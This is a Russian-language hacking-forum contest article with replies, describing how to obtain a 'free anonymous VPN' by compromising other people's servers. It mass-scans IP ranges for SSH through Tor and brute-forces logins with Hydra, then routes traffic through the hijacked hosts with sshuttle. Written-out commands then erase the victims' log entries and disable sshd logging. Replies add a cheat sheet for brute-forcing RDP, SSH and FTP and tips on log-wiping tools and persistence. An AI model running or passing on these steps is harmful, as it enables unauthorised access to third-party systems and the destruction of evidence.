Конкурс Бесплатный и анонимный "впн" без логов

  • Автор темы Автор темы TROOPY
  • Дата начала Дата начала
  • Теги Теги
    впн
Статья для участия в конкурсе на codeby

Всем привет! Решил написать статью об одном способе получения бесплатного и анонимного «впн», который не пишет логи. Если вкратце, то мы будем добывать ssh-туннели и пускать весь трафик через них с помощью sshuttle.

Для работы нам потребуется linux-дистрибутив со следующими инструментами:

  • ProxyChains-NG
  • Masscan
  • Hydra
  • Sshuttle
  • Tor
Часть первая. Описание программ
ProxyChains-NG - программа для соксификации трафика(понадобиться, чтобы анонимно сканировать и брутить туннели)
Masscan - сканер портов(потребуется для того, чтобы просканировать диапазоны на открытость 22 порта, то есть ssh)
Hydra - программа, которая позволит подобрать пароль к ssh-туннелю
Sshuttle - утилита, которая пустит весь наш трафик через полученный туннель
Tor - думаю, не нуждается в представлении

Часть вторая. Установка и настройка программ
Устанавливаем тор:
Код:
sudo apt-get install torsocks tor
Теперь отредактируем конфигурационный файл тор(это нужно для того, чтобы использовать его в качестве прокси при анонимном сканировании). Открываем /etc/tor/torrc и в самый конец пишем:
Код:
DNSPort                53530
TransPort              9040
gg.png
И добавляем его в автозапуск:
Код:
sudo systemctl start tor
sudo systemctl enable tor
Так же устанавливаем ProxyChains-NG:
Код:
sudo apt-get install git gcc
sudo apt-get remove proxychains
git clone https://github.com/rofl0r/proxychains-ng.git
cd proxychains-ng/
./configure --prefix=/usr --sysconfdir=/etc
make
sudo make install
sudo make install-config
Устанавливаем masscan:
Код:
sudo apt-get install git gcc make libpcap-dev
git clone https://github.com/robertdavidgraham/masscan
cd masscan
make
И установим последние две программы:
Код:
sudo apt-get remove hydra
sudo apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra/
./configure
make
sudo make install
и
Код:
apt-get install sshuttle
Часть третья. Работа с утилитами
Для начало нам необходимо получить список ip-адресов. Заходим на и выбираем нужную вам страну, например, Польшу:
ggg.png
Копируем и сохраняем в файл diapazon.txt
Запускаем masscan со следующими аргументами,
Код:
proxychains4 masscan -iL diapazon.txt -p22 --rate=10000 |awk '{print $6}' > result.txt
где:
proxychains4 используется для анонимного сканирования
аргумент -iL используется для того, чтобы выбрать файл с ip-адресами
аргумент -p22 используется для того, чтобы указать порт 22, который обычно используется ssh
аргумент --rate используется для того, чтобы выбрать скорость сканирования(количество пакетов, которое будет отправлено, я ставлю 10000, а вы на свое усмотрение)
awk используется для того, чтобы записать результат в виде готовых ip-адресов
В результате получим список адресов:
gggg.png
Теперь с помощью гидры будем брутить туннели,
Код:
 hydra -L login.txt -P pass.txt -M result.txt -o hydra_result.log -t 64  -v -V ssh HYDRA_PROXY=[socks5]://127.0.0.1:9050
где:
login.txt - список логинов для брута (можно оставить стандартные admin, root или же составить свой список, но желательно root, т.к чтобы отключить логи потребуются права суперпользователя)
pass.txt - список паролей для брута (так же можете составить свой список)
result.txt - список ip-адресов для брута(адреса, которые проверяли на ssh в программе masscan)
hydra_result.log - место куда будут записаны сбрученые туннели
-t 64 - аргумент, который говорит утилите использовать максимальное количество потоков
-v -V - аргументы, которые отвечает за вывод информаци о процессе брута
ssh - тип протокола, который будет брутиться
HYDRA_PROXY - аргумент, который производит брут через прокси тора
Часть четвертая. Подключение к туннелю и отключение логов
Для подключения к ssh-туннелю будем использовать уже известную нам утилиту sshuttle,
Код:
sudo sshuttle --dns -r username@ip:port 0.0.0.0/0 -vv
где:
--dns - аргумент, который позволяет заворачивать в туннель dns-трафик
username@ip:port - соответственно логин, ip и порт от ssh-туннеля
0.0.0.0/0 - аргумент, который говорит системе завернуть весь трафик через туннель
-vv - вывод о работе утилите
Программа сначала запросит пароль от вашей системы, а потом от сервера.
Так же имеются и минусы у данной утилиты, первый это то, что она заворачивает трафик только ipv4 и второй, что она имеет не большую скорость
Теперь самая главная и нужная часть, отключение логов.
Для чистки логов будем использовать следующий набор команд:
Код:
MYIP=$(echo $SSH_CLIENT | awk ‘{ print $1}’); IPLOGS=$(grep -lr $MYIP /var/log);for L in $IPLOGS;do rm -f /tmp/tmplog; cp -f $L /tmp/tmplog; sed -i «/$MYIP/,+3d» /tmp/tmplog; cat /tmp/tmplog > $L;done;rm -f /tmp/tmplog
Этот набор команд найдет все файлы содержащие наш ip адрес в папке /var/log и удалит их + удалит 3 строчки после.
Альтернативный метод:
Код:
rm -f /var/log/wtmp
rm -f /var/log/btmp
rm -f /var/log/lastlog && ln -s /dev/null /var/log/lastlog
rm -f /var/run/utmp
А также следует отключить логи sshd:
Открываем файл /etc/ssh/sshd_config, ищем строчку LogLevel (по умолчанию там будет уровень INFO) и заменяем INFO на QUIET.
Должно выглядеть так:
Код:
LogLevel QUIET
Затем надо перезапустить sshd демона:
Код:
sudo service ssh restart
Часть пятая. Заключение
Первое, что хочется сказать в заключение это то, что данный метод не является панацеей. Не стоит использовать только этот рубеж защиты. Анонимность - это комплекс мер, который должен постоянно обновляться и совершенствоваться.
Второе, советую использовать так называемую цепочку анонимности в которой этот метод будет стоять в конце.
Третье, помните, что за вами всегда следят и какую бы вы защиту не выстраивали всегда найдется способ вас задеанонить, поэтому лучшем способ обороны будет постоянная рандоминизация ваших цепочек анонимности, например постоянно меняйте wi-fi к которому подключаетесь, меняйте сервер, на котором стоит ваш впн, меняйте выходную ноду тора(желательно свою) и т.д.
На этом пожалуй всё, если что-то вспомню ещё, то дополню статью.
 
Последнее редактирование:
Собрал я по вашей схеме программы и поставил
Запускаю:
proxychains4 masscan -iL diapazon.txt -p22 --rate=10000 |awk '{print $6}' > result.txt
и masscan оголдело ломится напрямую минуя tor.
Смотрел снифером tcpdump -i wlan0

add: диапозоны для ip адресов надо добавлять без пробелов иначе не то сканится...
 
Последнее редактирование:
и masscan оголдело ломится напрямую минуя tor.
Тебя интересует анонимное сканирование портов ?
Если тебе принципиально пропустить трафик через ТОР, то воспользуйся утилитой nmap вместо masscan .
Подними локальный прокси с помощью программы privoxy

Для анонимного сканирования, команда будет следующей:
Код:
nmap ЦЕЛЬ --proxies socks4://127.0.0.1:9050
Подробности читай в статье: https://codeby.net/kak-ves-trafik-v...tor-nastrojka-tor-i-privoxy-v-kali-linux-2-0/

Если ты сканируешь с домашнего компа, то можно пропустить трафик через VPN-сервер. Это даже лучше, чем ТОР - скорость больше.
 
  • Нравится
Реакции: Vertigo, TROOPY и elfear
masscan не будет ходить через сокс proxychains тут не поможет, и с vpn могут осложнения возникнуть, уважающий себя провайдер быстро заметит сканирование и закроет доступ к порту (если не забанит вовсе), однако есть провайдеры которые не обращают внимание на жалобы на masscan, хотя и их частенько вносят в черные списки, masscan - не панацея
 
Минус в том, что тонели очень быстро мрут.
Трафик можно завернуть через ferm (iptables). Если не хочется самому там лазить, можно просто выдернуть конфиги из Tails. Ну, и подправить, если нужно.
 
я хочу знать, по какой причине удаляется предустановленная гидра, а затем ставится гидра из гит-хаба?
 
Минус в том, что тонели очень быстро мрут.
Трафик можно завернуть через ferm (iptables). Если не хочется самому там лазить, можно просто выдернуть конфиги из Tails. Ну, и подправить, если нужно.
Это не минус, а плюс т.к нам и надо их постоянно менять.
я хочу знать, по какой причине удаляется предустановленная гидра, а затем ставится гидра из гит-хаба?
Считается, что она более стабильна и спокойно может встать на любой дистрибутив. Хотя можно и предустановленной пользоваться.
 
Последнее редактирование:
  • Нравится
Реакции: Vertigo
@TROOPY, насколько я понимаю Вы единственный участник конкурса :)
Я планировала написать несколько статей на эту тему.
Злодейка-судьба совсем лишила меня свободного времени в конкурсный промежуток времени ))
Работа. Жара.
После работы мозг уже не может сосредоточиться (

Напишу задуманное после конкурса с пометкой "анонимность" или чем-то аналогичным.
На мой взгляд, это довольно простая тема.
По этой теме можно много писать, поднимать дискуссии, шум, споры, драки. :)
 
Предлагаю продлить конкурс, т.к я тоже собирался написать ещё одну статью на эту тему.
Вашу статью можно написать для другого конкурса, стартующего сегодня вечером :)

Напишите мне в ЛС Ваш логин в нашей школе, чтобы мы могли предоставить доступ к курсу. Поздравляю с победой!
 
  • Нравится
Реакции: Vertigo
Второй день пытаюсь решить проблему. При начале Брута гидрой вылазит это:
[ERROR] Compiled without LIBSSH v0.4.x supp
ort, module is not available!
 
Второй день пытаюсь решить проблему. При начале Брута гидрой вылазит это:
[ERROR] Compiled without LIBSSH v0.4.x supp
ort, module is not available!
В чём заключается твоя проблема ?
В том, что гидра не желает брутить протокол SSH ?
Логи говорят о том, что не установлен модуль гидры.

Проверь, имеет ли модуль дополнительные параметры
# hydra -U ssh


Вот тебе дополнительная шпаргалка, но написанная мною для работы в centOS 7 ))
Команду yum замени на apt-get (если у тебя дебианопобобный линукс)
Код:
Брутим RDP из-под Linux.
ProxyChains-NG + Masscan + Hydra.

# yum update
cd ~
Установим необходимые репозитории
# yum -y install epel-release

Поскольку для анонимности мы будем использовать Tor,
то установим необходимые пакеты, которые нам понадобяться, а также нам пригодятся сетевые утилиты:
# yum -y install torsocks tor mc git net-tools.x86_64

В самый конец файла /etc/tor/torrc добавьте строки:
# mcedit /etc/tor/torrc

AutomapHostsOnResolve  1
DNSPort                53530
TransPort              9040

Запустите и добавьте в автозапуск службу Tor:
# systemctl start tor
# systemctl enable tor

Проверяем слушается ли наш порт:
# netstat -an | grep -i listen




Устанавливаем proxychains
Рroxychains-ng можно установить тремя способами:
1. При помощи скрипта по адресу https://gist.github.com/ifduyue/dea03b4e139c5758ca114770027cf65c
******************************************************************************************
#!/bin/sh
# Usage:
#   wget -O- https://gist.githubusercontent.com/ifduyue/dea03b4e139c5758ca114770027cf65c/raw/install-proxychains-ng.sh | sudo bash -s

set -eu

version=4.12
wget https://github.com/rofl0r/proxychains-ng/archive/v$version.tar.gz
tar xf v$version.tar.gz


(cd proxychains-ng-$version
./configure
make
make install
[[ -f /etc/proxychains.conf ]] || cp src/proxychains.conf /etc/proxychains.conf
)

rm -rf v$version.tar.gz proxychains-ng-$version
*********************************************************************************8
2. Из репозитория  PUIAS repository


3. Компилируя из исходников. Этим мы сейчас и займёмся.
Просматриваем какие группы есть ?
# yum grouplist

Для начала установим Development Tools.
# yum groups install "Development Tools"


# git clone https://github.com/rofl0r/proxychains-ng.git
# cd proxychains-ng/
# ./configure --prefix=/usr --sysconfdir=/etc
# make
# make install
# make install-config
# cd .. && rm -rf proxychains-ng



Установка masscan :
# yum search masscan
# yum -y install masscan

Сканирование.

У masscan есть несколько удобных выходных форматов, таких как бинарный файл и XML.
Но сейчас нам нужен текстовый
Запускаем сканирование на выходе будет читый список IPs:
# # masscan -iL ranges.txt -p22 --rate=1000 |awk '{print $6}' > resultssh.txt

Перед каждой командой masscan нам нужно добавлять proxychains4,
тогда сканирование будет производиться через Tor:
# proxychains4 masscan -iL ranges.txt -p22 --rate=1000 |awk '{print $6}' > resultssh.txt


Установка hydra :
# yum -y install hydra

Кстати, для пользователей Linux доступен графический интерфейс (GTK gui), для его запуска наберите
# yum -y install xhydra


Использование Hydra в командной строке
Проверим, имеет ли модуль дополнительные параметры
# hydra -U ssh

Брут RDP :
# proxychains4 masscan -iL ranges.txt -p3389 --rate=1000 |awk '{print $6}' > resultssh.txt
# hydra -L ~/login.txt -P ~/pass_lists/routery_pass.txt -M resultssh.txt -o ~/hydra_result.log -t 64 -f -v -V ssh HYDRA_PROXY=[socks5]://127.0.0.1:9050


Чтобы закрыть терминал, но при этом оставить работать запущенную из него программу:

Для запуска программ в фоновом режиме следует использовать утилиту nohup:
# nohup hydra -L ~/login.txt -P ~/pass_lists/top500.txt -M ~/resultrdp.txt -o ~/hydra_result.log -t 64 -f -v -V rdp HYDRA_PROXY=[socks5]://127.0.0.1:9050
В этом случае запущенный скрипт останется работать даже при отключении от сервера,
но весь выводимый скриптом текст будет записываться в файл nohup.log,
создаваемый в текущем каталоге, о чем nohup непосредственно и информирует сообщением nohup:
appending output to nohup.out. При этом данный файл будет создан даже в том случае,
если у скрипта никогда не будет никакого вывода.

Чтобы nohup.log никогда не создавался, перенаправляем stdout скрипта в /dev/null:
# nohup hydra -L ~/login.txt -P ~/pass_lists/top500.txt -M ~/resultrdp.txt -o ~/hydra_result.log -t 64 -f -v -V rdp HYDRA_PROXY=[socks5]://127.0.0.1:9050 >/dev/null & exit




Для того, чтоб после посмотреть работает ли гидра выполни:
# ps ax
или
# ps ax | grep hydra
А для того чтоб убить все процессы с гидрой:
# for proc in $(ps ax | grep hydra | cut -d" " -f 1); do kill $proc; done;

И смотрим на процесс
# ps -aux | grep nohup


А для того чтоб убить все процессы с гидрой:
$ for proc in $(ps ax | grep hydra | cut -d" " -f 1); do kill $proc; done;





Брут RDP на нестандартном порту 3390:
# proxychains4 masscan -iL ranges.txt -p3390 --rate=1000 |awk '{print $6}' > resultrdp.txt
# hydra -L ~/login.txt -P ~/pass_lists/top500.txt -M ~/resultrdp.txt -o ~/hydra_result.log -s 3389 -t 4 -f -v -V rdp HYDRA_PROXY=[socks5]://127.0.0.1:9050

Брут FTP :
# proxychains4 masscan -iL ranges.txt -p21 --rate=1000 |awk '{print $6}' > resultftp.txt
# proxychains4 hydra -l admin -P ~/pass_lists/top500.txt -e nsr -o ./hydra_result.log -f -V -s 21 -M resultftp.txt  ftp


Настройка.
-R Восстановить предыдущую сессию, которая по какой-либо причине была прервана
-S Использовать SSL соединение
-s PORT Указание порта (отличного от дефолтного) сервиса
-l LOGIN Использовать указанный логин для попытки аутентификации
-L FILE Использовать список логинов из указанного файла
-p PASS Использовать указанный пароль для попытки аутентификации
-P FILE Использовать список паролей из указанного файла
-x Генерировать пароли для подбора самостоятельно, указывается в формате -x MIN:MAX:CHARSET, где MIN — это минимальная длинна пароля, MAX — соответственно, максимальная, а CHARSET — это набор символов, в котором a означает латиницу в нижнем регистре, A — в верхнем регистре, 1 — числа, а для указания дополнительных символов — просто укажи их как есть. Вот несколько примеров генерации паролей:
-x 3:5:a — длинной от 3 до 5 символов, состоящие только из символов латиницы в нижнем регистре;
-x 5:8:A1 — длинной от 5 до 8 символов, состоящие из символов латиницы в верхнем регистре + цифр;
-x 1:3:/ — длинной от 1 до 3 символов, состоящие только из символов слеша /;
-x 5:5:/%,.- — длинной в 5 символов, состоящие только из символов /%,.-;
-u Пытаться подобрать логин а не пароль
-C FILE Использовать файл в формате login:pass вместо указания -L/-P
-M FILE Файл со списком целей для брутфорса (можно с указанием порта через двоеточие), по одному на строку
-o FILE Записать подобранную пару логин/пароль в файл, вместо того чтоб просто вывести в stdout (будет указан с указанием сервера, к которому подобран — не запутаешься)
-f / -F Прекратить работу, как только первая пара логин:пароль будет подобрана. -f только для текущего хоста, -F — глобально.
-t TASKS Количество параллельных процессов (читай — потоков). По умолчанию 16, максимальное - 64
-w Таймаут для ответа сервера. По умолчанию 32 секунды
-W Таймаут между ответами сервера
-4 / -6 Использовать IPv4 (по умолчанию) или IPv6 адреса (при указании с -M всегда заключай в [])
-v Более подробный вывод информации о процессе
-V Выводить каждый подбираемый логин + пароль
-d Режим дебага
-O Использовать старый SSL v2 и v3
-q Не выводить сообщения об ошибках подключения
-U Дополнительная информация о использовании выбранного модуля
-h Вывод справочной информации
Дополнительно вы также можете пробовать пароли, основанные на логины, это делается опцией «-e».
-e nsr Укажи n для проверки пустых паролей, s для попытки использования в качестве пароля — логин, и (или) r для попытки входа под перевернутым логином
Опция «-e» имеет три параметра:
    s — пробовать логин как пароль
    n — пробовать пустой пароль
    r — перестановка в логине символов с зада на перёд и использование получившегося слова в качестве пароля





КОНЕЦ
ДОПОЛНЕНИЯ

Чтобы закрыть терминал, но при этом оставить работать запущенную из него программу,
перейдите в терминал и нажмите сочетание клавиш Ctrl+Z
(это позволит вам получить доступ к командой строке).
Затем наберите в терминале следующие команды:
Нажимаем CTRL + Z

Команда disown с ключом -h используется для того,
чтобы пометить процесс с номером 1
(это наша запущенная программа) не закрываться при закрытии терминала
(на нее не подействует сигнал SIGHUP)

# disown -h %1

Команда bg переводит процесс в фоновый режим .
Запустить программу в фоновом режиме можно с помощью конструкции <команда> &
После этого отключаемся или продолжаем работу
Для возврата к процессу перебора выполни
# bg 1


Проверим висит ли наш процесс:
ps ax | grep hydra



Можно еще так запустить на выходе будет читый список IPs:
# masscan -iL ranges.txt -p3389 --rate=1000 |awk '{print $6}' > result.txt

# proxychains masscan -p3389 -iL ranges.txt --rate=80000 -sT -Pn -n --randomize-hosts --output-filename ips.txt
# proxychains masscan -p3389,3390,3391-3399 -iL ranges.txt --rate=800 -sT -Pn -n --randomize-hosts --output-format list --output-filename ips.txt


—rate 1000 — не советую ставить очень  много, иначе дед просто перестанет коннектится до тех пор, пока скан не будет закончен
Чем меньше --rate, тем меньше пропусков IPs.

# masscan -iL ranges.txt -p3389,3390,3391,8933 --max-rate 1000 -oX scan-01.xml
# masscan -iL ranges.txt -p3389 --max-rate 1000 --excludefile exclude.txt

# setsid hydra -L ~/login.txt -P ~/pass_lists/top500.txt -M ~/resultrdp.txt -o ~/hydra_result.log -t 64 -f -v -V rdp HYDRA_PROXY=[socks5]://127.0.0.1:9050 &


Вообще говоря, если тебе нужны ssh-тоннели, то прекращай ерундой заниматься.
Наилучший профит от брута ssh возможен в ОС Windows.
В Линукс только опыт работы с ситемой приобретёшь, но не тоннели ))
 
Последнее редактирование модератором:
В чём заключается твоя проблема ?
В том, что гидра не желает брутить протокол SSH ?
Логи говорят о том, что не установлен модуль гидры.

Проверь, имеет ли модуль дополнительные параметры
# hydra -U ssh


Вот тебе дополнительная шпаргалка, но написанная мною для работы в centOS 7 ))
Команду yum замени на apt-get (если у тебя дебианопобобный линукс)
Код:
Брутим RDP из-под Linux.
ProxyChains-NG + Masscan + Hydra.

# yum update
cd ~
Установим необходимые репозитории
# yum -y install epel-release

Поскольку для анонимности мы будем использовать Tor,
то установим необходимые пакеты, которые нам понадобяться, а также нам пригодятся сетевые утилиты:
# yum -y install torsocks tor mc git net-tools.x86_64

В самый конец файла /etc/tor/torrc добавьте строки:
# mcedit /etc/tor/torrc

AutomapHostsOnResolve  1
DNSPort                53530
TransPort              9040

Запустите и добавьте в автозапуск службу Tor:
# systemctl start tor
# systemctl enable tor

Проверяем слушается ли наш порт:
# netstat -an | grep -i listen




Устанавливаем proxychains
Рroxychains-ng можно установить тремя способами:
1. При помощи скрипта по адресу https://gist.github.com/ifduyue/dea03b4e139c5758ca114770027cf65c
******************************************************************************************
#!/bin/sh
# Usage:
#   wget -O- https://gist.githubusercontent.com/ifduyue/dea03b4e139c5758ca114770027cf65c/raw/install-proxychains-ng.sh | sudo bash -s

set -eu

version=4.12
wget https://github.com/rofl0r/proxychains-ng/archive/v$version.tar.gz
tar xf v$version.tar.gz


(cd proxychains-ng-$version
./configure
make
make install
[[ -f /etc/proxychains.conf ]] || cp src/proxychains.conf /etc/proxychains.conf
)

rm -rf v$version.tar.gz proxychains-ng-$version
*********************************************************************************8
2. Из репозитория  PUIAS repository


3. Компилируя из исходников. Этим мы сейчас и займёмся.
Просматриваем какие группы есть ?
# yum grouplist

Для начала установим Development Tools.
# yum groups install "Development Tools"


# git clone https://github.com/rofl0r/proxychains-ng.git
# cd proxychains-ng/
# ./configure --prefix=/usr --sysconfdir=/etc
# make
# make install
# make install-config
# cd .. && rm -rf proxychains-ng



Установка masscan :
# yum search masscan
# yum -y install masscan

Сканирование.

У masscan есть несколько удобных выходных форматов, таких как бинарный файл и XML.
Но сейчас нам нужен текстовый
Запускаем сканирование на выходе будет читый список IPs:
# # masscan -iL ranges.txt -p22 --rate=1000 |awk '{print $6}' > resultssh.txt

Перед каждой командой masscan нам нужно добавлять proxychains4,
тогда сканирование будет производиться через Tor:
# proxychains4 masscan -iL ranges.txt -p22 --rate=1000 |awk '{print $6}' > resultssh.txt


Установка hydra :
# yum -y install hydra

Кстати, для пользователей Linux доступен графический интерфейс (GTK gui), для его запуска наберите
# yum -y install xhydra


Использование Hydra в командной строке
Проверим, имеет ли модуль дополнительные параметры
# hydra -U ssh

Брут RDP :
# proxychains4 masscan -iL ranges.txt -p3389 --rate=1000 |awk '{print $6}' > resultssh.txt
# hydra -L ~/login.txt -P ~/pass_lists/routery_pass.txt -M resultssh.txt -o ~/hydra_result.log -t 64 -f -v -V ssh HYDRA_PROXY=[socks5]://127.0.0.1:9050


Чтобы закрыть терминал, но при этом оставить работать запущенную из него программу:

Для запуска программ в фоновом режиме следует использовать утилиту nohup:
# nohup hydra -L ~/login.txt -P ~/pass_lists/top500.txt -M ~/resultrdp.txt -o ~/hydra_result.log -t 64 -f -v -V rdp HYDRA_PROXY=[socks5]://127.0.0.1:9050
В этом случае запущенный скрипт останется работать даже при отключении от сервера,
но весь выводимый скриптом текст будет записываться в файл nohup.log,
создаваемый в текущем каталоге, о чем nohup непосредственно и информирует сообщением nohup:
appending output to nohup.out. При этом данный файл будет создан даже в том случае,
если у скрипта никогда не будет никакого вывода.

Чтобы nohup.log никогда не создавался, перенаправляем stdout скрипта в /dev/null:
# nohup hydra -L ~/login.txt -P ~/pass_lists/top500.txt -M ~/resultrdp.txt -o ~/hydra_result.log -t 64 -f -v -V rdp HYDRA_PROXY=[socks5]://127.0.0.1:9050 >/dev/null & exit




Для того, чтоб после посмотреть работает ли гидра выполни:
# ps ax
или
# ps ax | grep hydra
А для того чтоб убить все процессы с гидрой:
# for proc in $(ps ax | grep hydra | cut -d" " -f 1); do kill $proc; done;

И смотрим на процесс
# ps -aux | grep nohup


А для того чтоб убить все процессы с гидрой:
$ for proc in $(ps ax | grep hydra | cut -d" " -f 1); do kill $proc; done;





Брут RDP на нестандартном порту 3390:
# proxychains4 masscan -iL ranges.txt -p3390 --rate=1000 |awk '{print $6}' > resultrdp.txt
# hydra -L ~/login.txt -P ~/pass_lists/top500.txt -M ~/resultrdp.txt -o ~/hydra_result.log -s 3389 -t 4 -f -v -V rdp HYDRA_PROXY=[socks5]://127.0.0.1:9050

Брут FTP :
# proxychains4 masscan -iL ranges.txt -p21 --rate=1000 |awk '{print $6}' > resultftp.txt
# proxychains4 hydra -l admin -P ~/pass_lists/top500.txt -e nsr -o ./hydra_result.log -f -V -s 21 -M resultftp.txt  ftp


Настройка.
-R Восстановить предыдущую сессию, которая по какой-либо причине была прервана
-S Использовать SSL соединение
-s PORT Указание порта (отличного от дефолтного) сервиса
-l LOGIN Использовать указанный логин для попытки аутентификации
-L FILE Использовать список логинов из указанного файла
-p PASS Использовать указанный пароль для попытки аутентификации
-P FILE Использовать список паролей из указанного файла
-x Генерировать пароли для подбора самостоятельно, указывается в формате -x MIN:MAX:CHARSET, где MIN — это минимальная длинна пароля, MAX — соответственно, максимальная, а CHARSET — это набор символов, в котором a означает латиницу в нижнем регистре, A — в верхнем регистре, 1 — числа, а для указания дополнительных символов — просто укажи их как есть. Вот несколько примеров генерации паролей:
-x 3:5:a — длинной от 3 до 5 символов, состоящие только из символов латиницы в нижнем регистре;
-x 5:8:A1 — длинной от 5 до 8 символов, состоящие из символов латиницы в верхнем регистре + цифр;
-x 1:3:/ — длинной от 1 до 3 символов, состоящие только из символов слеша /;
-x 5:5:/%,.- — длинной в 5 символов, состоящие только из символов /%,.-;
-u Пытаться подобрать логин а не пароль
-C FILE Использовать файл в формате login:pass вместо указания -L/-P
-M FILE Файл со списком целей для брутфорса (можно с указанием порта через двоеточие), по одному на строку
-o FILE Записать подобранную пару логин/пароль в файл, вместо того чтоб просто вывести в stdout (будет указан с указанием сервера, к которому подобран — не запутаешься)
-f / -F Прекратить работу, как только первая пара логин:пароль будет подобрана. -f только для текущего хоста, -F — глобально.
-t TASKS Количество параллельных процессов (читай — потоков). По умолчанию 16, максимальное - 64
-w Таймаут для ответа сервера. По умолчанию 32 секунды
-W Таймаут между ответами сервера
-4 / -6 Использовать IPv4 (по умолчанию) или IPv6 адреса (при указании с -M всегда заключай в [])
-v Более подробный вывод информации о процессе
-V Выводить каждый подбираемый логин + пароль
-d Режим дебага
-O Использовать старый SSL v2 и v3
-q Не выводить сообщения об ошибках подключения
-U Дополнительная информация о использовании выбранного модуля
-h Вывод справочной информации
Дополнительно вы также можете пробовать пароли, основанные на логины, это делается опцией «-e».
-e nsr Укажи n для проверки пустых паролей, s для попытки использования в качестве пароля — логин, и (или) r для попытки входа под перевернутым логином
Опция «-e» имеет три параметра:
    s — пробовать логин как пароль
    n — пробовать пустой пароль
    r — перестановка в логине символов с зада на перёд и использование получившегося слова в качестве пароля





КОНЕЦ
ДОПОЛНЕНИЯ

Чтобы закрыть терминал, но при этом оставить работать запущенную из него программу,
перейдите в терминал и нажмите сочетание клавиш Ctrl+Z
(это позволит вам получить доступ к командой строке).
Затем наберите в терминале следующие команды:
Нажимаем CTRL + Z

Команда disown с ключом -h используется для того,
чтобы пометить процесс с номером 1
(это наша запущенная программа) не закрываться при закрытии терминала
(на нее не подействует сигнал SIGHUP)

# disown -h %1

Команда bg переводит процесс в фоновый режим .
Запустить программу в фоновом режиме можно с помощью конструкции <команда> &
После этого отключаемся или продолжаем работу
Для возврата к процессу перебора выполни
# bg 1


Проверим висит ли наш процесс:
ps ax | grep hydra



Можно еще так запустить на выходе будет читый список IPs:
# masscan -iL ranges.txt -p3389 --rate=1000 |awk '{print $6}' > result.txt

# proxychains masscan -p3389 -iL ranges.txt --rate=80000 -sT -Pn -n --randomize-hosts --output-filename ips.txt
# proxychains masscan -p3389,3390,3391-3399 -iL ranges.txt --rate=800 -sT -Pn -n --randomize-hosts --output-format list --output-filename ips.txt


—rate 1000 — не советую ставить очень  много, иначе дед просто перестанет коннектится до тех пор, пока скан не будет закончен
Чем меньше --rate, тем меньше пропусков IPs.

# masscan -iL ranges.txt -p3389,3390,3391,8933 --max-rate 1000 -oX scan-01.xml
# masscan -iL ranges.txt -p3389 --max-rate 1000 --excludefile exclude.txt

# setsid hydra -L ~/login.txt -P ~/pass_lists/top500.txt -M ~/resultrdp.txt -o ~/hydra_result.log -t 64 -f -v -V rdp HYDRA_PROXY=[socks5]://127.0.0.1:9050 &


Вообще говоря, если тебе нужны ssh-тоннели, то прекращай ерундой заниматься.
Наилучший профит от брута ssh возможен в ОС Windows.
В Линукс только опыт работы с ситемой приобретёшь, но не тоннели ))
Спасибо за ответ и шпаргалку) то что нужно. Но и сейчас не выходит потому что всё так же не качаються lib ы. Можно увидеть записи в sourse.list ? У меня:
deb wheezy main
deb-src wheezy main

deb wheezy-updates main
deb-src wheezy-updates main

Нужны нормальные источники для скачки lib ов.
 

Вложения

  • Screenshot_2018-06-13-23-24-00.png
    Screenshot_2018-06-13-23-24-00.png
    57,7 КБ · Просмотры: 207
Последнее редактирование:
Для чистки логов будем использовать следующий набор команд:
Код:
MYIP=$(echo $SSH_CLIENT | awk ‘{ print $1}’); IPLOGS=$(grep -lr $MYIP /var/log);for L in $IPLOGS;do rm -f /tmp/tmplog; cp -f $L /tmp/tmplog; sed -i «/$MYIP/,+3d» /tmp/tmplog; cat /tmp/tmplog > $L;done;rm -f /tmp/tmplog



Этот набор команд найдет все файлы содержащие наш ip адрес в папке /var/log и удалит их + удалит 3 строчки после.

Альтернативный метод:

Код:


rm -f /var/log/wtmp
rm -f /var/log/btmp
rm -f /var/log/lastlog && ln -s /dev/null /var/log/lastlog
rm -f /var/run/utmp


А также следует отключить логи sshd:
Открываем файл /etc/ssh/sshd_config, ищем строчку LogLevel (по умолчанию там будет уровень INFO) и заменяем INFO на QUIET.
Для чистки логов советую использовать утилиту nojail.py, описана в статье ниже:

По поводу умирания сбрученных хостов, смогли сбрутить вы, смог так же кто то еще и тут два исхода:
- Либо пришел хозяин хоста и выкинул вас и всех кто там сидит, так как увеличился объем трафика проходящего через его хост;
- Либо вас выкинули те, кто так же как и вы незаконно получили доступ к узлу. (Тут как вариант как раз здесь использовать SSH-ключи в качестве закрепления в системе)
 
  • Нравится
Реакции: Сергей Попов
ТС хорошая статья. От себя отмечу, что ОБЯЗАТЕЛЬНО в /etc/tor/torrc нужно добавить строки
Код:
ExcludeNodes {ru}, {ua}, {by}
(ну или код страны где находитесь) чтобы кое кому неповадно мониторить было...
Мне кажется лучше ставить вот так ExcludeExitNodes {RU}, {BY}, {UA} только выходную ноду исключать этих стран,а в середине цепочки пусть болтаются эти страны,трафик же перехватить можно только на выходном узле!
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab